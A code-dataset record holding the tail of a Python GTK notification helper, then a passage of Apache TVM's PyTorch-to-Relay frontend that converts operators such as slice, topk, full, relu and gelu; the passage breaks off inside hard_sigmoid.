        """n.get_data(key) <--> n.data[key]
        Only exists for compatibility with pynotify."""
        return self._data[key]

    def set_icon_from_pixbuf(self, icon):
        """Set a custom icon from a GdkPixbuf."""
        self._hints["icon_data"] = self._get_icon_struct(icon)

    @staticmethod
    def _get_icon_struct(icon):
        """Build the DBus-serialisable image structure for the icon_data hint."""
        return (
            icon.get_width(),
            icon.get_height(),
            icon.get_rowstride(),
            icon.get_has_alpha(),
            icon.get_bits_per_sample(),
            icon.get_n_channels(),
            dbus.ByteArray(icon.get_pixels()),
        )

    def set_location(self, x, y):
        """Set the notification location as (x, y), if the server supports it."""
        if (not isinstance(x, int)) or (not isinstance(y, int)):
            raise TypeError("x and y must both be ints", (x, y))
        self._hints["x"] = x
        self._hints["y"] = y
if __name__ == "__main__":
    # Manual smoke test: show one notification ten times, updating the
    # title/body each iteration and swapping the icon halfway through.
    import gi

    gi.require_version("Gtk", "3.0")
    from gi.repository import Gtk

    init("Test")
    helper = Gtk.Button()
    # render_icon gives us a Pixbuf for a stock icon to exercise
    # set_icon_from_pixbuf.
    a_icon = helper.render_icon(Gtk.STOCK_DIALOG_INFO, Gtk.IconSize.DIALOG)
    t = GtkToast("Title", "Body")
    t.set_icon_from_pixbuf(a_icon)
    for i in range(10):
        t.title = f"Title{i}"
        t.body = f"Body{i}"
        t.show()
        time.sleep(0.1)
        if i == 4:
            a_icon = helper.render_icon(Gtk.STOCK_DIALOG_QUESTION, Gtk.IconSize.DIALOG)
            t.set_icon_from_pixbuf(a_icon)
| 30.835784
| 111
| 0.642636
|
4a07ad6444cdc64ed80ffb255dddff83b553abea
| 147,637
|
py
|
Python
|
python/tvm/relay/frontend/pytorch.py
|
T-head-Semi/tvm
|
c1b8e06685c92fb7cacbe989e147b0622aee4503
|
[
"Apache-2.0"
] | 4
|
2021-10-19T06:22:55.000Z
|
2022-03-17T22:55:12.000Z
|
python/tvm/relay/frontend/pytorch.py
|
T-head-Semi/tvm
|
c1b8e06685c92fb7cacbe989e147b0622aee4503
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/relay/frontend/pytorch.py
|
T-head-Semi/tvm
|
c1b8e06685c92fb7cacbe989e147b0622aee4503
|
[
"Apache-2.0"
] | 2
|
2021-10-19T03:28:37.000Z
|
2022-03-17T22:55:14.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, too-many-lines, len-as-condition, no-else-return, unused-variable, too-many-nested-blocks
# pylint: disable=consider-iterating-dictionary, invalid-name, unused-argument, unused-variable, broad-except
# pylint: disable=import-outside-toplevel, simplifiable-if-expression, cell-var-from-loop, unnecessary-lambda
# pylint: disable=missing-function-docstring
"""PT: PyTorch frontend."""
import functools
import itertools
import logging
import math
import sys
import numpy as np
import tvm
from tvm.ir import IRModule
from tvm.topi.utils import get_const_tuple
from .. import analysis as _analysis
from .. import expr as _expr
from .. import function as _function
from .. import op as _op
from .. import qnn, transform
from ..expr_functor import ExprMutator
from ..loops import while_loop
from ..prelude import Prelude, StaticTensorArrayOps
from ..ty import Any, TensorType, TupleType
from . import qnn_torch
from .common import AttrCvt, get_relay_op, gru_cell
from .common import infer_shape as _infer_shape
from .common import infer_value as _infer_value
from .common import infer_value_simulated as _infer_value_simulated
from .common import lstm_cell, try_infer_value, unbind
from .common import set_span
from .pytorch_utils import is_version_greater_than
__all__ = ["from_pytorch"]
# This returns a "subgraph" which puts variables whenever
# the type is known. It also records things to map the input
# nodes to the extracted graph's nodes.
# As Python objects are not round-trippable through C++, and
# our type annotations only live in Python, we need to map
# the we need to map the nodes we get in visiting to the nodes
# we used to construct the graph (they are the same in C++,
# match each other in dictionary lookups, but are not the same
# in Python) by using the hint dictionary filled as
# {node: node for node in nodes} to get the type annotations.
# https://discuss.tvm.apache.org/t/round-tripping-objects-through-the-ffi/8440
class _TypeFinder(ExprMutator):
    """Mutator that replaces sub-expressions of known type with fresh typed vars.

    Used by PyTorchOpConverter.infer_type to cut a node out of the graph as a
    standalone function whose inputs carry the type annotations already
    recorded for the corresponding nodes (see the module comment above).
    """

    def __init__(self, types):
        super().__init__()
        self.counter = 0  # suffix for generated variable names
        self.vars = {}  # expr -> the Var substituted for it
        self.types = types  # expr -> known Relay type annotation
        self.leave = set()  # some variables are not inputs

    def visit_let(self, let):
        # Let-bound variables are definitions, not free inputs.
        self.leave.add(let.var)
        return super().visit_let(let)

    def visit_function(self, fn):
        # Function parameters are bound inside the function, not free inputs.
        self.leave.update(fn.params)
        return super().visit_function(fn)

    def visit(self, expr):
        if expr in self.leave:
            return super().visit(expr)
        if expr in self.vars:
            return self.vars[expr]
        if isinstance(expr, tvm.relay.Var):
            # Existing variables are kept as-is and recorded as inputs.
            self.vars[expr] = expr
            return expr
        if expr in self.types:
            # Known type: cut the subtree here and expose it as a typed input.
            ty = self.types[expr]
            v = tvm.relay.var(f"_{self.counter}", type_annotation=ty)
            self.counter += 1
            self.vars[expr] = v
            return v
        v = super().visit(expr)
        return v
def _should_construct_dynamic_list(list_construct_node):
    # if this list is element-accessed or modified at runtime, generate List ADT
    def inplace_add_to_add(op_name):
        # Treat the in-place aten::add_ the same as aten::add for the check below.
        if op_name == "aten::add_":
            return "aten::add"
        else:
            return op_name

    uses = _get_uses(list_construct_node)
    # Follow the list through prim::Loop block inputs so that uses inside the
    # loop body are considered as well.
    for loop_use in filter(lambda use: use.user.kind() == "prim::Loop", uses):
        block_input_index = loop_use.offset - 1
        block = list(loop_use.user.blocks())[0]
        list_loop_var = list(block.inputs())[block_input_index]
        uses += _get_uses(list_loop_var.node())
    op_names = map(inplace_add_to_add, set(use.user.kind() for use in uses))
    # Element access, or add combined with any other list op, forces the ADT.
    list_ops = set(["aten::add", "aten::__getitem__"])
    intersect = list_ops.intersection(op_names)
    if len(intersect) > 0 and intersect != set(["aten::add"]):
        return True
    # if add op outputs list, it is dynamic so we need to construct List ADT
    for use in filter(lambda use: use.user.kind() in ["aten::add", "aten::add_"], uses):
        output_type = _get_node_type(use.user)
        if output_type == "ListType":
            return True
    return False
def _is_int_seq(seq):
# TODO (t-vi): handle non-int constants? (like numpy.intXX)
return len(seq) > 0 and all([isinstance(i, int) for i in seq])
# operator implementation
class PyTorchOpConverter:
"""A helper class for holding PyTorch op converters."""
    def __init__(self, prelude, default_dtype):
        """Set up the converter state.

        prelude: the Relay Prelude, used for the List ADT and tensor arrays.
        default_dtype: dtype name used when a PyTorch op does not fix one.
        """
        self.prelude = prelude
        self.default_dtype = default_dtype
        self.create_convert_map()
        self.types = {}  # map from nodes to (Relay) type annotations

    # this incrementally infers the type, see the comments on the type visitor
    # above.
    def infer_type(self, node, mod=None):
        """An incremental method to infer the type of a node in the relay graph.

        Results are memoized in ``self.types``; `_TypeFinder` replaces
        already-typed subtrees with annotated vars so only the new part of
        the graph is type-checked each time.
        """
        if node in self.types:
            return self.types[node]
        if isinstance(node, tvm.relay.Var):
            return node.type_annotation

        tf = _TypeFinder(types=self.types)
        new_node = tf.visit(node)
        # Wrap the (cut-down) expression in a function so it forms a module.
        fn = _function.Function(list(tf.vars.values()), new_node)
        new_mod = IRModule({"main": fn})
        if mod is not None:
            # Merge in caller-supplied definitions (e.g. the prelude).
            new_mod.update(mod)
        new_mod = transform.RemoveUnusedFunctions()(new_mod)
        new_mod = transform.InferType()(new_mod)
        entry = new_mod["main"]
        ty = entry.body.checked_type
        self.types[node] = ty
        return self.types[node]
def infer_type_with_prelude(self, val):
body = self.infer_type(val, self.prelude.mod)
return body
# list ADT utilities
    def convert_to_list_adt(self, py_lst):
        """Convert a Python list of Relay exprs into a prelude List ADT value.

        All elements must have the same Relay type.
        """
        elem_tys = [self.infer_type_with_prelude(elem) for elem in py_lst]
        msg = "List elements should have identical types"
        assert all(map(lambda ty: ty == elem_tys[0], elem_tys)), msg

        # get_type returns type_name, ctor1, ..., ctorN
        # 1 is nil
        _, cons, nil = self.prelude.mod.get_type("List")
        adt_lst = nil()
        # Build back-to-front so the ADT preserves the original order.
        for elem in reversed(py_lst):
            adt_lst = cons(elem, adt_lst)
        return adt_lst
    def map_tensor_array_constructor(self, adt_lst, shape):
        """Wrap each element of an ADT list in a static tensor-array tensor.

        Hard-coded to float32 elements of the given static ``shape``.
        """
        static_tensor_array_ops = StaticTensorArrayOps(self.prelude, "float32", shape)
        static_tensor_array_ops.register()
        tensor_create = self.prelude.get_tensor_ctor_static("tensor_constructor", "float32", shape)
        return self.prelude.map(tensor_create, adt_lst)
    def convert_to_tensor_array(self, adt_lst):
        """Convert an ADT list of tensors into a static tensor array.

        Returns (tensor_array, shape) for non-empty input.
        NOTE(review): the empty-list branch returns a bare nil() rather than
        a (value, shape) pair — callers that unpack two values would fail on
        an empty list; confirm whether that path is reachable.
        """
        _, cons, nil = self.prelude.mod.get_type("List")
        if self.prelude.length(adt_lst) == 0:
            return nil()

        # Element shape is taken from the list head; all elements are assumed
        # to share it.
        checked_type = self.infer_type_with_prelude(self.prelude.hd(adt_lst))
        shape = checked_type.shape
        tensor_array = self.map_tensor_array_constructor(adt_lst, shape)
        return tensor_array, tuple(shape)
    def infer_shape(self, inputs, mod=None):
        """A method to get the output type of an intermediate node in the graph.

        Returns a tuple of ints for tensor types, or the raw Relay type
        (e.g. a List type) otherwise.
        """
        typ = self.infer_type(inputs, mod=mod)
        if hasattr(typ, "shape"):
            # Regular operator that outputs tensors
            return get_const_tuple(typ.shape)
        # The return type is not a tensor, for example List
        return typ
    def infer_shape_with_prelude(self, inputs):
        """Shape inference that also resolves prelude (List ADT) types."""
        return self.infer_shape(inputs, mod=self.prelude.mod)
    def record_output_type(self, output):
        """Populate the type cache for an op's output(s).

        Tuples are typed as a group (skipping None members); single exprs
        are typed directly. Non-expr outputs (plain ints etc.) are ignored.
        """
        if isinstance(output, tuple):
            cleaned_output = [o for o in output if o is not None]
            types = self.infer_type_with_prelude(_expr.Tuple(cleaned_output))
            for o, t in zip(cleaned_output, types.fields):
                self.types[o] = t
        elif isinstance(output, _expr.Expr):
            self.infer_type_with_prelude(output)
        # it can also happen that the type is int or so
    def pytorch_promote_types(self, inputs, dtypes):
        """This promotes TVM inputs with TVM dtypes passed like PyTorch would.

        Scalars become consts of the promoted dtype; tensors are cast only
        when their dtype differs from the promoted result type.
        """
        # Prefer inferred dtypes over the caller-supplied ones for exprs —
        # the traced dtype list can be stale.
        actual_dtypes = []
        for i, inp in enumerate(inputs):
            if isinstance(inp, _expr.Expr):
                idt = self.infer_type(inp).dtype
                actual_dtypes.append(idt)
            else:
                actual_dtypes.append(dtypes[i])
        dtypes = actual_dtypes
        # PyTorch's promotion treats tensor and scalar operands differently.
        tensor_dtypes = [dt for inp, dt in zip(inputs, dtypes) if not np.isscalar(inp)]
        non_tensor_inputs = [inp for inp in inputs if np.isscalar(inp)]
        result_type = _pytorch_result_type(tensor_dtypes, non_tensor_inputs)
        results = []
        for inp, dt in zip(inputs, dtypes):
            if np.isscalar(inp):
                results.append(_expr.const(inp, dtype=result_type))
            elif dt == result_type:
                results.append(inp)
            else:
                results.append(_op.cast(inp, result_type))
        return results
    def is_quantized_tensor(self, data):
        """Return True if Relay infers *data* to be a quantized (uint8) tensor."""
        # If a quantized Torch module is saved and loaded back, dtype will be dropped
        # Since dtypes from Torch tensors are not reliable in such cases, we use
        # Relay's type inference result to decide if an input tensor is quantized
        ty = self.infer_type_with_prelude(data)
        return ty.dtype == "uint8"
# Operator implementations
def make_elemwise(self, name):
def elemwise(inputs, input_types):
data0, data1 = self.pytorch_promote_types(inputs[:2], input_types[:2])
return get_relay_op(name)(data0, data1)
return elemwise
    def min_max_common(self, name_elemwise, name_reduce, inputs, input_types):
        """Shared lowering for aten::min/aten::max.

        One input -> full reduction; (tensor, int dim [, keepdim]) ->
        reduction over a dim (plus dummy indices, matching PyTorch's
        (values, indices) return); two tensors -> elementwise op.
        """
        if len(inputs) == 1:
            data = self.pytorch_promote_types(inputs[:1], input_types[:1])
            return get_relay_op(name_reduce)(data[0])
        elif len(inputs) >= 2 and isinstance(inputs[1], int):
            data = self.pytorch_promote_types(inputs[:1], input_types[:1])
            dim = inputs[1]
            keepdims = inputs[2] if len(inputs) > 2 else False
            # also return dummy indices
            return get_relay_op(name_reduce)(data[0], axis=dim, keepdims=keepdims), None
        else:
            data0, data1 = self.pytorch_promote_types(inputs[:2], input_types[:2])
            return get_relay_op(name_elemwise)(data0, data1)
    def max(self, inputs, input_types):
        """aten::max — elementwise maximum or max-reduction, chosen by arity."""
        return self.min_max_common("maximum", "max", inputs, input_types)
    def min(self, inputs, input_types):
        """aten::min — elementwise minimum or min-reduction, chosen by arity."""
        return self.min_max_common("minimum", "min", inputs, input_types)
def make_unary(self, name):
def unary(inputs, input_types):
# this is just to ensure tensor input
(data,) = self.pytorch_promote_types(inputs[:1], input_types[:1])
return get_relay_op(name)(data)
return unary
def log1p(self, inputs, input_types):
# 1_plus_log x = log(x + 1)
(dtype,) = input_types
one = _expr.const(1, dtype=dtype)
return _op.log(inputs[0] + one)
    def arange(self, inputs, input_types):
        """Convert aten::arange (both the 5-arg and 7-arg TorchScript forms)."""

        def _get_value(val, dtype):
            # dtype is a tvm dtype
            if isinstance(val, _expr.Expr):
                # Try to fold a Relay expr to a constant of the target dtype.
                inp = _op.cast(val, dtype)
                ret, _ = try_infer_value(inp, lambda ret: _expr.const(ret, dtype))
            else:
                ret = _create_typed_const(val, dtype)
            return ret

        def _get_type(val, inp_type):
            if isinstance(val, _expr.Expr):
                dtype = str(self.infer_type(val))
                return dtype
            return inp_type

        # PyTorch arange uses the following type semantics:
        # - if a dtype is given, start, stop, step are converted to that dtype
        # - if no dtype is given and all args are integral, dtype is int64
        # - if no dtype is given and there is a float arg, dtype is float32
        if len(inputs) == 5:
            # arange(stop, dtype, layout, device, pin_memory)
            dtype0 = _get_type(inputs[0], input_types[0])
            if inputs[1] is not None:
                dtype = _convert_dtype_value(inputs[1])
            elif dtype0.startswith("float"):
                dtype = "float32"
            else:
                dtype = "int64"
            start = _expr.const(0, dtype)
            stop = _get_value(inputs[0], dtype)
            step = _expr.const(1, dtype)
        elif len(inputs) == 7:
            # arange(start, stop, step, dtype, layout, device, pin_memory)
            types = [_get_type(inputs[i], input_types[i]) for i in range(3)]
            if inputs[3] is not None:
                dtype = _convert_dtype_value(inputs[3])
            elif any([t.startswith("float") for t in types]):
                dtype = "float32"
            else:
                dtype = "int64"
            start = _get_value(inputs[0], dtype)
            stop = _get_value(inputs[1], dtype)
            step = _get_value(inputs[2], dtype)
        else:
            msg = "Unknown number of arguments (%d) to parse." % (len(inputs))
            raise AssertionError(msg)

        return _op.transform.arange(start=start, stop=stop, step=step, dtype=dtype)
def squeeze(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 1:
axis = None
else:
# TODO (t-vi): why is the cast to int needed? similarly elsewhere
axis = [int(inputs[1])]
return _op.transform.squeeze(data, axis)
def unsqueeze(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
return _op.transform.expand_dims(data, int(axis), 1)
    def concatenate(self, inputs, input_types):
        """Convert aten::cat; non-list inputs are treated as List ADT values."""

        def tensor_array_concat(lst, axis):
            assert axis == 0, "Tensor array concat supported only for axis 0"
            tensor_array, shape = self.convert_to_tensor_array(lst)
            # Concat dim becomes dynamic (Any) in the result shape.
            concat_shape = (Any(),) + shape[1:]
            concat = self.prelude.get_global_var_static("tensor_array_concat", "float32", shape)
            concatenated = concat(tensor_array)

            static_tensor_array_ops = StaticTensorArrayOps(self.prelude, "float32", concat_shape)
            static_tensor_array_ops.register()
            get_tensor = self.prelude.get_global_var_static(
                "tensor_get_data", "float32", concat_shape
            )
            return get_tensor(concatenated)

        data = inputs[0]
        axis = inputs[1]

        if not isinstance(data, list):
            return tensor_array_concat(data, axis)

        # NOTE(review): this branch is unreachable — an _expr.Expr is not a
        # list, so it already returned above.
        if isinstance(data, _expr.Expr):
            data = [data]

        return _op.tensor.concatenate(data, int(axis))
def slice(self, inputs, input_types):
axis_dtype = "int64"
index_size_limit = sys.maxsize
data = inputs[0]
dshape = self.infer_shape(data)
ndim = len(dshape)
dim = int(inputs[1])
stride = inputs[4]
target_begin, is_begin_const = try_infer_value(
inputs[2], lambda ret: ret.astype(np.int).item(0)
)
target_end, is_end_const = try_infer_value(
inputs[3], lambda ret: ret.astype(np.int).item(0)
)
# A fast path when slicing is nop.
if (
isinstance(target_begin, int)
and isinstance(target_end, int)
and target_begin == 0
and target_end >= index_size_limit
and stride == 1
):
return data
# Process begin
begin = [0] * ndim
begin[dim] = target_begin
if not isinstance(begin[dim], int):
tmp = []
for b in begin:
if isinstance(b, int):
tmp.append(_op.expand_dims(_expr.const(b, axis_dtype), axis=0))
else:
tmp.append(_op.cast(_op.expand_dims(b, axis=0), axis_dtype))
begin = _op.concatenate(tmp, axis=0)
btype = self.infer_type(begin).dtype
if str(btype) != axis_dtype:
begin = _op.cast(begin, axis_dtype)
# Process end
if isinstance(target_end, int) and target_end >= index_size_limit:
target_end = dshape[dim]
if any([isinstance(d, tvm.tir.Any) for d in dshape]):
end = _op.shape_of(data)
else:
end = dshape
if isinstance(target_end, int):
if isinstance(end, list):
end[dim] = target_end
else:
all_static = True
for i, shape_dim in enumerate(dshape):
if i != dim and isinstance(shape_dim, tvm.tir.Any):
all_static = False
if all_static:
end = list(get_const_tuple(dshape))
end[dim] = target_end
else:
target_end = _expr.const(target_end)
end = _op.scatter(
end,
_op.expand_dims(_expr.const(dim), axis=0),
_op.expand_dims(target_end, axis=0),
axis=0,
)
else:
end = _op.cast(_op.shape_of(data), axis_dtype)
if not isinstance(target_end, tvm.tir.Any):
ttype = self.infer_type(target_end).dtype
if str(ttype) != axis_dtype:
target_end = _op.cast(target_end, axis_dtype)
end = _op.scatter(
end,
_op.expand_dims(_expr.const(dim), axis=0),
_op.expand_dims(target_end, axis=0),
axis=0,
)
if not isinstance(end, list):
etype = self.infer_type(end).dtype
if str(etype) != axis_dtype:
end = _op.cast(end, axis_dtype)
strides = [1] * ndim
strides[dim] = stride
return _op.transform.strided_slice(
data, begin=begin, end=end, strides=strides, slice_mode="end"
)
    def narrow(self, inputs, input_types):
        """Convert aten::narrow by lowering to a stride-1 slice."""
        # Inputs are:
        # 0 - the tensor to narrow
        # 1 - the dimension along which to narrow
        # 2 - the starting dimension
        # 3 - the distance to the ending dimension
        # Lets find the ending dimension
        end = self.add(inputs[2:4], input_types[2:4])
        stride = 1
        slice_input = inputs[:3] + [end, stride]
        slice_types = input_types + ["int32"]
        return self.slice(slice_input, slice_types)
def split(self, inputs, input_types):
data = inputs[0]
split_size = int(inputs[1])
dim = int(inputs[2])
split_index = split_size
indices = []
while split_index < self.infer_shape(data)[dim]:
indices.append(split_index)
split_index += split_size
return _op.split(data, indices, dim)
    def split_with_sizes(self, inputs, input_types):
        """Convert aten::split_with_sizes (explicit per-chunk sizes)."""
        data = inputs[0]
        sections = inputs[1]
        dim = int(inputs[2])

        if len(sections) == 1:
            # a special case used in torchvision detection models
            return _expr.TupleWrapper(_expr.Tuple([data]), 1)

        # Relay split takes cut positions; accumulate the section sizes.
        # The last section is implied, so only len-1 indices are needed.
        split_index = 0
        indices = []
        for i in range(len(sections) - 1):
            index, _ = try_infer_value(sections[i], lambda ret: int(ret))
            split_index += index
            indices.append(split_index)

        return _op.split(data, indices, dim)
def select(self, inputs, input_types):
data = inputs[0]
dim = int(inputs[1])
index = _wrap_const(inputs[2])
return _op.transform.take(data, index, axis=dim, mode="wrap")
def take(self, inputs, input_types):
data = inputs[0]
indices = _op.cast(inputs[1], "int32")
return _op.transform.take(data, indices=indices, mode="wrap")
    def topk(self, inputs, input_types):
        """Convert aten::topk -> relay topk, returning (values, indices).

        Only sorted output is supported; ``largest`` maps to is_ascend=False.
        """
        data = inputs[0]
        axis = int(inputs[2])
        is_ascend = not bool(inputs[3])
        sort = bool(inputs[4])

        # k may itself be a (foldable) Relay expression.
        if isinstance(inputs[1], _expr.Expr):
            k, _ = try_infer_value(inputs[1], lambda ret: ret.tolist())
        else:
            k = inputs[1]

        if not sort:
            msg = "Currently supports only sorted output for topk operator."
            raise AssertionError(msg)

        outs = _op.topk(data, k=k, axis=axis, is_ascend=is_ascend, ret_type="both", dtype="int64")

        return outs[0], outs[1]
def reciprocal(self, inputs, input_types):
data = inputs[0]
return _expr.const(1.0, dtype=input_types[0]) / data
    def repeat(self, inputs, input_types):
        """Convert aten::repeat (tile) — repetition counts must fold to ints."""
        data = inputs[0]
        reps = []
        for r in inputs[1]:
            if isinstance(r, int):
                reps.append(r)
            else:
                # Fold Relay-expression rep counts to concrete ints.
                reps.append(int(_infer_value(r, {}).numpy()))

        return _op.transform.tile(data, reps=reps)
    def repeat_interleave(self, inputs, input_types):
        """Convert aten::repeat_interleave with a single scalar repeat count."""
        data = inputs[0]
        if isinstance(inputs[1], int):
            repeats = inputs[1]
            axis = inputs[2]
        elif isinstance(inputs[1], _expr.Expr):
            if isinstance(inputs[1], _expr.Constant):
                repeats = int(inputs[1].data.numpy())
            else:
                repeats, _ = try_infer_value(inputs[1], lambda ret: ret.tolist())
            axis = inputs[2]
        else:
            # Per-element repeat tensors are not supported.
            msg = "Only repeat with one value as repeat is currently supported."
            raise AssertionError(msg)
        if axis is None:  # Flatten the data if no axis is given from torch
            data = _op.transform.reshape(data, [-1])
            axis = 0
        return _op.transform.repeat(data, repeats=repeats, axis=axis)
def addcdiv(self, inputs, input_types):
data, t1, t2, c = self.pytorch_promote_types(inputs[:4], input_types[:4])
return data + (c * (t1 / t2))
def addcmul(self, inputs, input_types):
data, t1, t2, c = self.pytorch_promote_types(inputs[:4], input_types[:4])
return data + (c * (t1 * t2))
    def where(self, inputs, input_types):
        """Convert aten::where.

        The one-argument form torch.where(cond) is nonzero(as_tuple=True).
        """
        if len(inputs) == 1:
            return self.nonzero([inputs[0], True], input_types)

        cond = inputs[0]
        # x and y are promoted like any binary PyTorch op; cond stays bool.
        x, y = self.pytorch_promote_types(inputs[1:3], input_types[1:3])
        return _op.where(cond, x, y)
    def full_impl(self, data, fill_value, dtype):
        """Shared lowering for ones/zeros/full.

        data: the target shape — a list whose entries may be ints or Relay
        exprs. Static entries are collected into `size`; if any entry cannot
        be folded, `size` becomes a dynamic 1-D shape tensor and the result
        is reshaped afterwards to recover the partially-known shape.
        """
        size = []
        need_reshape = False
        new_shape = []

        # Convert to callable size
        for dim in data:
            if isinstance(dim, _expr.Expr):
                if isinstance(dim, _expr.Constant):
                    dim = int(dim.data.numpy())
                    if isinstance(size, list):
                        size.append(dim)
                    new_shape.append(dim)
                else:
                    # NOTE(review): the third arg (`lambda: 0`) appears to be
                    # a fallback producing 0 on failure — confirm against
                    # try_infer_value's signature.
                    dim, success = try_infer_value(dim, lambda ret: int(ret), lambda: 0)
                    new_shape.append(dim)

                    if success:
                        if isinstance(size, list):
                            size.append(dim)
                    else:
                        # Dynamic dim: fall back to a shape tensor.
                        size = None
                        need_reshape = True
            else:
                if isinstance(size, list):
                    size.append(dim)
                new_shape.append(dim)

        if size is None:
            tmp = []
            for dim in data:
                tmp.append(_op.cast(_op.expand_dims(dim, axis=0), "int64"))
            size = _op.concatenate(tmp, axis=0)

        out = _op.full(_expr.const(fill_value), size, dtype=dtype)
        if need_reshape:
            out = _op.reshape(out, new_shape)
        return out
def ones(self, inputs, input_types):
data = inputs[0]
import torch
if not isinstance(data, (_expr.Expr, list, torch.Tensor, np.ndarray)):
msg = "Data type %s could not be parsed in ones op" % (type(data))
raise AssertionError(msg)
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
return self.full_impl(data, 1, dtype)
def ones_like(self, inputs, input_types):
data = inputs[0]
out = _op.ones_like(data)
# If the input and the output datatype is different, do a cast
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
if input_types[0] != dtype:
out = _op.cast(out, dtype)
return out
def zeros(self, inputs, input_types):
data = inputs[0]
import torch
if not isinstance(data, (_expr.Expr, list, torch.Tensor, np.ndarray)):
msg = "Data type %s could not be parsed in zeros op" % (type(data))
raise AssertionError(msg)
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
return self.full_impl(data, 0, dtype)
def zeros_like(self, inputs, input_types):
data = inputs[0]
out = _op.zeros_like(data)
# If the input and the output datatype is different, do a cast
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
if input_types[0] not in dtype:
out = _op.cast(out, dtype)
return out
def full(self, inputs, input_types):
data = inputs[0]
fill_value = inputs[1]
import torch
if not isinstance(data, (_expr.Expr, list, torch.Tensor, np.ndarray)):
msg = "Data type %s could not be parsed in full op" % (type(data))
raise AssertionError(msg)
if inputs[2] is not None: # dtype given
dtype = _convert_dtype_value(inputs[2])
else:
# if dtype is None, torch uses a global default set by torch.set_default_tensor_type()
dtype = self.default_dtype
return self.full_impl(data, fill_value, dtype)
def full_like(self, inputs, input_types):
data = inputs[0]
fill_value = inputs[1]
out = _op.full_like(data, _expr.const(fill_value))
# If the input and the output datatype is different, do a cast
if inputs[2] is not None: # dtype given
dtype = _convert_dtype_value(inputs[2])
else:
# if dtype is None, torch uses a global default set by torch.set_default_tensor_type()
dtype = self.default_dtype
if input_types[0] not in dtype:
out = _op.cast(out, dtype)
return out
def linspace(self, inputs, input_types):
start = inputs[0]
stop = inputs[1]
step = inputs[2]
# Find the spacing between values as step
if step != 1:
step = (stop - start) / (step - 1)
stop = stop + step
else:
stop = start + step
dtype = "float32" if inputs[3] is not None else _convert_dtype_value(inputs[3])
start = _create_typed_const(start, dtype)
stop = _create_typed_const(stop, dtype)
step = _create_typed_const(step, dtype)
return _op.transform.arange(start=start, stop=stop, step=step, dtype=dtype)
    def relu(self, inputs, input_types):
        """Convert aten::relu, dispatching to the QNN variant for uint8 input."""
        data = inputs[0]
        if self.is_quantized_tensor(data):
            assert len(inputs) == 3, "Input quant param not found in op inputs"
            # Quantized relu clips against the zero point, not 0.
            input_zero_point = _expr.const(inputs[2], dtype="int32")
            return qnn_torch.quantized_relu(data, input_zero_point)
        return _op.nn.relu(data)
    def prelu(self, inputs, input_types):
        """Convert aten::prelu; alpha is broadcast to the channel count."""
        # Reference: https://pytorch.org/docs/stable/generated/torch.nn.PReLU.html#torch.nn.PReLU
        data = inputs[0]
        dim = self.get_dims(data)
        ndims = len(dim)
        # 1-D inputs have no channel dim; otherwise channels are axis 1 (NCHW).
        axis = 0 if ndims == 1 else 1
        alpha = _op.broadcast_to(inputs[1], (dim[axis]))
        return _op.nn.prelu(data, alpha, axis)
def leaky_relu(self, inputs, input_types):
data = inputs[0]
alpha = float(inputs[1])
return _op.nn.leaky_relu(data, alpha)
    def elu(self, inputs, input_types):
        """Convert aten::elu.

        alpha is stored negated so that for x < 0:
        -alpha * relu(1 - exp(x)) == alpha * (exp(x) - 1), and relu(x)
        contributes the positive branch.
        """
        data = inputs[0]
        dtype = input_types[0]
        alpha = _expr.const(-float(inputs[1]), dtype=dtype)
        return alpha * _op.nn.relu(_expr.const(1, dtype=dtype) - _op.exp(data)) + _op.nn.relu(data)
    def celu(self, inputs, input_types):
        """Convert aten::celu.

        celu(x) = max(0, x) + min(0, alpha * (exp(x / alpha) - 1)); the
        negative branch is expressed via relu of (1 - exp(x / alpha)).
        """
        data = inputs[0]
        dtype = input_types[0]
        alpha = _expr.const(float(inputs[1]), dtype=dtype)
        return alpha * _op.nn.relu(
            _expr.const(1, dtype=dtype) - _op.exp(data / alpha)
        ) + _op.nn.relu(data)
    def gelu(self, inputs, input_types):
        """Convert aten::gelu using the exact (erf-based) formulation."""
        data = inputs[0]
        dtype = input_types[0]
        # gelu is data * normcdf(data)
        # normcdf expressed as erf because we don't currently have that intrinsic
        # note that there is also a fastgelu variant approximating normcdf
        # with tanh and third order polynomials, but this is "true" gelu
        return data * (
            _expr.const(0.5, dtype=dtype)
            + _op.erf(data * _expr.const(0.5 ** 0.5, dtype=dtype)) * _expr.const(0.5, dtype=dtype)
        )
    def selu(self, inputs, input_types):
        """Convert aten::selu — gamma-scaled ELU with fixed alpha/gamma."""
        data = inputs[0]
        # https://pytorch.org/docs/stable/nn.html#selu
        dtype = input_types[0]
        # alpha is negated (same trick as elu) so the relu-based expression
        # reproduces alpha * (exp(x) - 1) on the negative branch.
        alpha = _expr.const(-1.6732632423543772848170429916717, dtype=dtype)
        gamma = _expr.const(1.0507009873554804934193349852946, dtype=dtype)
        return gamma * (
            alpha * _op.nn.relu(_expr.const(1.0, dtype=dtype) - _op.exp(data)) + _op.nn.relu(data)
        )
def silu(self, inputs, input_types):
data = inputs[0]
return data * _op.tensor.sigmoid(data)
def log_sigmoid(self, inputs, input_types):
data = inputs[0]
return _op.log(_op.tensor.sigmoid(data))
    def hard_sigmoid(self, inputs, input_types):
        """Convert aten::hardsigmoid: clip(x + 3, 0, 6) / 6.

        For quantized input the op is computed in float between a
        dequantize/quantize pair (upcast trick).
        """

        def _relu6(x):
            return _op.tensor.clip(x, 0.0, 6.0)

        def func(x):
            return _relu6(x + _expr.const(3.0)) / _expr.const(6.0)

        if self.is_quantized_tensor(inputs[0]):
            input_scale = _expr.const(inputs[1])
            input_zero_point = _expr.const(inputs[2])
